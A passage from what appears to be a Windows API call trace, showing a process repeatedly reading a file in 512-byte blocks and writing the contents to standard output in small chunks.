lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.539] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.539] GetFileType (hFile=0x4c) returned 0x1 [0107.540] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.540] WriteFile (in: hFile=0x4c, lpBuffer=0x1aef34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aef34*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.540] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.540] GetFileType (hFile=0x4c) returned 0x1 [0107.540] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.540] WriteFile (in: hFile=0x4c, lpBuffer=0x1aef84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aef84*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.540] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.540] GetFileType (hFile=0x4c) returned 0x1 [0107.540] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.540] WriteFile (in: hFile=0x4c, lpBuffer=0x1aefd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aefd4*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.540] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.540] GetFileType (hFile=0x4c) returned 0x1 [0107.540] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.540] WriteFile (in: hFile=0x4c, lpBuffer=0x1af024*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1af024*, lpNumberOfBytesWritten=0x1ae028*=0x20, lpOverlapped=0x0) returned 1 [0107.540] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.540] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.540] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.540] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.540] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.540] GetFileType (hFile=0x4c) returned 0x1 [0107.540] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.540] GetFileType (hFile=0x4c) returned 0x1 [0107.540] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.540] WriteFile (in: hFile=0x4c, lpBuffer=0x1aee44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.540] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.540] GetFileType (hFile=0x4c) returned 0x1 [0107.540] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.540] WriteFile (in: hFile=0x4c, lpBuffer=0x1aee94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aee94*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.540] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.540] GetFileType (hFile=0x4c) returned 0x1 [0107.541] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.541] WriteFile (in: hFile=0x4c, lpBuffer=0x1aeee4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aeee4*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.541] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.541] GetFileType (hFile=0x4c) returned 0x1 [0107.541] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.541] WriteFile (in: hFile=0x4c, lpBuffer=0x1aef34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aef34*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.541] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.541] GetFileType (hFile=0x4c) returned 0x1 [0107.541] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.541] WriteFile (in: hFile=0x4c, lpBuffer=0x1aef84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aef84*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.541] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.541] GetFileType (hFile=0x4c) returned 0x1 [0107.541] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.541] WriteFile (in: hFile=0x4c, lpBuffer=0x1aefd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aefd4*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.541] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.541] GetFileType (hFile=0x4c) returned 0x1 [0107.541] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.541] WriteFile (in: hFile=0x4c, lpBuffer=0x1af024*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1af024*, lpNumberOfBytesWritten=0x1ae028*=0x20, lpOverlapped=0x0) returned 1 [0107.541] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.541] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.541] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.541] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.541] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.541] GetFileType (hFile=0x4c) returned 0x1 [0107.541] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.541] GetFileType (hFile=0x4c) returned 0x1 [0107.541] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.541] WriteFile (in: hFile=0x4c, lpBuffer=0x1aee44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.541] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.541] GetFileType (hFile=0x4c) returned 0x1 [0107.541] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.541] WriteFile (in: hFile=0x4c, lpBuffer=0x1aee94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aee94*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.541] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.542] GetFileType (hFile=0x4c) returned 0x1 [0107.542] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.542] WriteFile (in: hFile=0x4c, lpBuffer=0x1aeee4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aeee4*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.542] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.542] GetFileType (hFile=0x4c) returned 0x1 [0107.542] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.542] WriteFile (in: hFile=0x4c, lpBuffer=0x1aef34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aef34*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.542] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.542] GetFileType (hFile=0x4c) returned 0x1 [0107.542] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.542] WriteFile (in: hFile=0x4c, lpBuffer=0x1aef84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aef84*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.542] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.542] GetFileType (hFile=0x4c) returned 0x1 [0107.542] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.542] WriteFile (in: hFile=0x4c, lpBuffer=0x1aefd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aefd4*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.542] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.542] GetFileType (hFile=0x4c) returned 0x1 [0107.542] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.542] WriteFile (in: hFile=0x4c, lpBuffer=0x1af024*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1af024*, lpNumberOfBytesWritten=0x1ae028*=0x20, lpOverlapped=0x0) returned 1 [0107.542] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.542] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.542] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.542] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.542] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.542] GetFileType (hFile=0x4c) returned 0x1 [0107.542] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.542] GetFileType (hFile=0x4c) returned 0x1 [0107.542] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.542] WriteFile (in: hFile=0x4c, lpBuffer=0x1aee44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.542] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.542] GetFileType (hFile=0x4c) returned 0x1 [0107.542] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.542] WriteFile (in: hFile=0x4c, lpBuffer=0x1aee94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aee94*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.543] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.543] GetFileType (hFile=0x4c) returned 0x1 [0107.543] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.543] WriteFile (in: hFile=0x4c, lpBuffer=0x1aeee4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aeee4*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.543] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.543] GetFileType (hFile=0x4c) returned 0x1 [0107.543] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.543] WriteFile (in: hFile=0x4c, lpBuffer=0x1aef34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aef34*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.543] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.543] GetFileType (hFile=0x4c) returned 0x1 [0107.543] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.543] WriteFile (in: hFile=0x4c, lpBuffer=0x1aef84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aef84*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.543] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.543] GetFileType (hFile=0x4c) returned 0x1 [0107.543] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.543] WriteFile (in: hFile=0x4c, lpBuffer=0x1aefd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aefd4*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.543] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.543] GetFileType (hFile=0x4c) returned 0x1 [0107.543] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.543] WriteFile (in: hFile=0x4c, lpBuffer=0x1af024*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1af024*, lpNumberOfBytesWritten=0x1ae028*=0x20, lpOverlapped=0x0) returned 1 [0107.543] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.543] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.543] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.543] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.543] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.544] GetFileType (hFile=0x4c) returned 0x1 [0107.544] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.544] GetFileType (hFile=0x4c) returned 0x1 [0107.544] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.544] WriteFile (in: hFile=0x4c, lpBuffer=0x1aee44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.544] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.544] GetFileType (hFile=0x4c) returned 0x1 [0107.544] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.544] WriteFile (in: hFile=0x4c, lpBuffer=0x1aee94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aee94*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.544] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.544] GetFileType (hFile=0x4c) returned 0x1 [0107.544] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.544] WriteFile (in: hFile=0x4c, lpBuffer=0x1aeee4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aeee4*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.544] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.544] GetFileType (hFile=0x4c) returned 0x1 [0107.544] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.544] WriteFile (in: hFile=0x4c, lpBuffer=0x1aef34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aef34*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.544] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.544] GetFileType (hFile=0x4c) returned 0x1 [0107.544] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.544] WriteFile (in: hFile=0x4c, lpBuffer=0x1aef84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aef84*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.544] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.544] GetFileType (hFile=0x4c) returned 0x1 [0107.544] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.545] WriteFile (in: hFile=0x4c, lpBuffer=0x1aefd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aefd4*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.545] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.545] GetFileType (hFile=0x4c) returned 0x1 [0107.545] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.545] WriteFile (in: hFile=0x4c, lpBuffer=0x1af024*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1af024*, lpNumberOfBytesWritten=0x1ae028*=0x20, lpOverlapped=0x0) returned 1 [0107.545] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.545] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.545] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.545] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.545] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.545] GetFileType (hFile=0x4c) returned 0x1 [0107.545] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.545] GetFileType (hFile=0x4c) returned 0x1 [0107.545] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.545] WriteFile (in: hFile=0x4c, lpBuffer=0x1aee44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.545] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.545] GetFileType (hFile=0x4c) returned 0x1 [0107.545] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.545] WriteFile (in: hFile=0x4c, lpBuffer=0x1aee94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aee94*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.545] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.545] GetFileType (hFile=0x4c) returned 0x1 [0107.545] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.545] WriteFile (in: hFile=0x4c, lpBuffer=0x1aeee4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aeee4*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.545] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.545] GetFileType (hFile=0x4c) returned 0x1 [0107.546] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.546] WriteFile (in: hFile=0x4c, lpBuffer=0x1aef34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aef34*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.546] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.546] GetFileType (hFile=0x4c) returned 0x1 [0107.546] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.546] WriteFile (in: hFile=0x4c, lpBuffer=0x1aef84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aef84*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.546] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.546] GetFileType (hFile=0x4c) returned 0x1 [0107.546] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.546] WriteFile (in: hFile=0x4c, lpBuffer=0x1aefd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aefd4*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.546] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.546] GetFileType (hFile=0x4c) returned 0x1 [0107.546] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.546] WriteFile (in: hFile=0x4c, lpBuffer=0x1af024*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1af024*, lpNumberOfBytesWritten=0x1ae028*=0x20, lpOverlapped=0x0) returned 1 [0107.546] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.546] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.546] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.546] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.546] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.546] GetFileType (hFile=0x4c) returned 0x1 [0107.546] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.546] GetFileType (hFile=0x4c) returned 0x1 [0107.546] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.546] WriteFile (in: hFile=0x4c, lpBuffer=0x1aee44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.547] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.547] GetFileType (hFile=0x4c) returned 0x1 [0107.547] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.547] WriteFile (in: hFile=0x4c, lpBuffer=0x1aee94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aee94*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.547] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.547] GetFileType (hFile=0x4c) returned 0x1 [0107.547] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.547] WriteFile (in: hFile=0x4c, lpBuffer=0x1aeee4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aeee4*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.547] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.547] GetFileType (hFile=0x4c) returned 0x1 [0107.547] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.547] WriteFile (in: hFile=0x4c, lpBuffer=0x1aef34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aef34*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.547] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.547] GetFileType (hFile=0x4c) returned 0x1 [0107.547] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.547] WriteFile (in: hFile=0x4c, lpBuffer=0x1aef84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aef84*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.547] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.547] GetFileType (hFile=0x4c) returned 0x1 [0107.547] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.547] WriteFile (in: hFile=0x4c, lpBuffer=0x1aefd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aefd4*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.547] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.547] GetFileType (hFile=0x4c) returned 0x1 [0107.547] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.547] WriteFile (in: hFile=0x4c, lpBuffer=0x1af024*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1af024*, lpNumberOfBytesWritten=0x1ae028*=0x20, lpOverlapped=0x0) returned 1 [0107.548] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.548] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.548] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.548] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.548] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.548] GetFileType (hFile=0x4c) returned 0x1 [0107.548] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.548] GetFileType (hFile=0x4c) returned 0x1 [0107.548] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.548] WriteFile (in: hFile=0x4c, lpBuffer=0x1aee44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.548] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.548] GetFileType (hFile=0x4c) returned 0x1 [0107.548] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.548] WriteFile (in: hFile=0x4c, lpBuffer=0x1aee94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aee94*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.548] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.548] GetFileType (hFile=0x4c) returned 0x1 [0107.548] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.548] WriteFile (in: hFile=0x4c, lpBuffer=0x1aeee4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aeee4*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.548] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.548] GetFileType (hFile=0x4c) returned 0x1 [0107.548] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.548] WriteFile (in: hFile=0x4c, lpBuffer=0x1aef34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aef34*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.549] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.549] GetFileType (hFile=0x4c) returned 0x1 [0107.549] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.549] WriteFile (in: hFile=0x4c, lpBuffer=0x1aef84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aef84*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.549] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.549] GetFileType (hFile=0x4c) returned 0x1 [0107.549] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.549] WriteFile (in: hFile=0x4c, lpBuffer=0x1aefd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aefd4*, 